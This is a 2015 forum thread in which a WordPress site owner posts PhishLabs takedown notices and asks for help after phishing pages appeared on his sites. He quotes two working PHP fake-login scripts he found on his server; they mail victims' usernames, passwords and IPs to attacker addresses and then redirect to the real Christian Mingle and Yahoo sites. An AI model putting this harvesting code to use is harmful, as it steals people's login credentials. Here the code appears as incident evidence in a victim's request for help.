Phishlabs? Who are they? - GoFuckYourself.com

hausarzt · 08-24-2015, 01:49 AM

I receive strange emails in the past for almost every of my sites:

Quote:

Our company investigates computer crime incidents on behalf of banks and other companies.

We have discovered that your web site, hottiescam.com, has been attacked by criminals. These criminals created a fake web page which appears to copy a Spark Networks site.

http:// my website .com/services/mchsvjbsuvkjn.html

If possible, please provide the following information to assist our investigation:

- Web server and FTP server log files for the past several days
- Copies of all phishing files, hack tools, or other hacker files

Finally, we kindly request that you disable or remove the phishing files as soon as possible.

We recommend taking the following actions to secure the web site and prevent the attackers from returning:

- Change your web hosting password
- Update your web applications including CMS, blog, ecommerce, and other applications (and all add-on modules/components/plugins)
- Search all of your web directories for suspicious files and investigate any found
- Scan the computer from which you login to your web hosting control panel or ftp server with anti-virus software

If you believe we have contacted you in error, or if we can provide any assistance with this incident, please contact us and let us know.

Thank you for your assistance with this matter,

Eric George
PhishLabs Security Operations
[email protected]
+1.202.386.6001
http://www.phishlabs.com

Another one through my abuse contact from my hosting:

Quote:

Our company investigates computer crime incidents on behalf of banks and other companies.

We have discovered that your web site, www.dirtycamsluts.com, has been attacked by criminals. These criminals created a fake web page which appears to copy a Spark Networks site.

hXXp www [dot] MY WEBSITE [dot] com/jimjim/mchsvjbsuvkjn [dot] html
hXXp www [dot] MY WEBSITE [dot] com/jimjim/login [dot] php

If possible, please provide the following information to assist our investigation:

- Web server and FTP server log files for the past several days
- Copies of all phishing files, hack tools, or other hacker files

Finally, we kindly request that you disable or remove the phishing files as soon as possible.

We recommend taking the following actions to secure the web site and prevent the attackers from returning:

- Change your web hosting password
- Update your web applications including CMS, blog, ecommerce, and other applications (and all add-on modules/components/plugins)
- Search all of your web directories for suspicious files and investigate any found
- Scan the computer from which you login to your web hosting control panel or ftp server with anti-virus software

If you believe we have contacted you in error, or if we can provide any assistance with this incident, please contact us and let us know.

Thank you for your assistance with this matter,

Matt Twitty
PhishLabs Security Operations
[email protected]
+1.202.386.6001
http://www.phishlabs.com

Sites are running on wordpress. I just checked the sites and found some strange folders in some installs, so I deleted them. Anyone else has this "problem"?

j3rkules · 08-24-2015, 01:56 AM

Never heard of them.

hausarzt · 08-24-2015, 03:18 AM

Alright, now google webmaster tool told me, that my sites are reported as phising sites.

I removed all suspicious files/folder from my sites.

A file called buff.php contained this:

http://pastebin.com/jJ3QS7UH

READ AT YOUR OWN RISK

My Avast goes wild on this file. Can anyone read/translate this?

Some fake-login php-files:

Quote:

<?php
$ip = getenv("REMOTE_ADDR");
$data=date("D M d, Y g:i a");
$message .= "User: ".$_POST['loginemail']."\n";
$message .= "PassWord: " .$_POST['password']."\n";
$message .= "Country: $ip\n";
$message .= "Date: $data\n";

$recipient = "[email protected]";
$subject = "Christian Mingle | $ip";
$headers = "From: Rashyd Bohaty <[email protected]>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);

header("Location: http://www.christianmingle.com/");
?>

Quote:

<?php
$ip = getenv("REMOTE_ADDR");

$data=date("D M d, Y g:i a");
$message .= "====== Hacked By OBO ======\n";
$message .= "User: ".$_POST['username']."\n";
$message .= "PassWord: " .$_POST['passwd']."\n";
$message .= "Country: $ip\n";
$message .= "Date: $data\n";
$message .= "====== ® Trademark 2015 ======\n";

$recipient = "[email protected]";
$recipient2 = "[email protected]";
$subject = "Y!Logs $ip";
$headers = "From: Rashyd Bohaty <[email protected]>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);
mail($recipient2,$subject,$message,$headers);
header("Location: http://www.yahoomail.com");

?>

MrGusMuller · 08-24-2015, 04:35 AM

it was sending the user/password to the hackers' email :/
change them all!!

MrGusMuller · 08-24-2015, 04:38 AM

try Sucuri Security ? WAF, DDoS Protection, Malware Removal, WordPress Security, and Blacklist Removal
they have helped some friends...

08-24-2015, 01:56 AM	#2
j3rkules VIP Industry Role: Join Date: Jul 2013 Posts: 22,105	Never heard of them. __________________ How To Build A Porn Site And Make Money \| My Best $$$ Cam Sponsor 3 Top Adult Hosting Providers

08-24-2015, 04:35 AM	#4
MrGusMuller Confirmed User Industry Role: Join Date: Oct 2010 Location: Portugal Posts: 1,261	it was sending the user/password to the hackers' email :/ change them all!! __________________ StagCMS - Adult CMS - user friendly adult content management system - speed up your websites with no SQL connections ICQ: 632343*113

08-24-2015, 04:38 AM	#5
MrGusMuller Confirmed User Industry Role: Join Date: Oct 2010 Location: Portugal Posts: 1,261	try Sucuri Security ? WAF, DDoS Protection, Malware Removal, WordPress Security, and Blacklist Removal they have helped some friends... __________________ StagCMS - Adult CMS - user friendly adult content management system - speed up your websites with no SQL connections ICQ: 632343*113